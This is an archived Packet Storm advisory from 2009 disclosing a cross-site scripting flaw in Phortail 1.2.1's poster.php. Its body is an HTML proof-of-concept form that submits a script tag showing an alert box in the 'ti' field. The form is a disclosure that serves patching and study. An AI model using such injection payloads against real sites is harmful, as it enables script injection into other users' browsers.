Phortail 1.2.1 Cross Site Scripting

2009-03-08T00:00:00
ID PACKETSTORM:75508
Type packetstorm
Reporter Jonathan Salwan
Modified 2009-03-08T00:00:00

Description

                                        
                                            `<html><head><title>PHORTAIL v1.2.1 XSS Vulnerability</title></head>  
<hr><pre>  
Module : PHORTAIL 1.2.1  
download : http://www.phpscripts-fr.net/scripts/download.php?id=330  
Vul : XSS Vulnerability  
file : poster.php  
Author : Jonathan Salwan  
Mail : submit [AT] shell-storm.org  
Web : http://www.shell-storm.org  
</pre><hr>  
  
<form name="rapporter" action="http://localhost/poster.php" method="POST"></br>  
<input type="hidden" name="ajn" value="1">  
<input type="text" name="pseudo" value="xss">=>Pseudo</br>  
<input type="text" name="email" value="xss@xss.com">=>E-mail</br>  
<input type="text" name="ti" value="<script>alert('xss PoC');</script>">=>XSS vulnerability</br>  
<input type="text" name="txt" value="xss">=>text</br>  
<input type="submit" value="Start"></br>  
</form>  
</html>  
`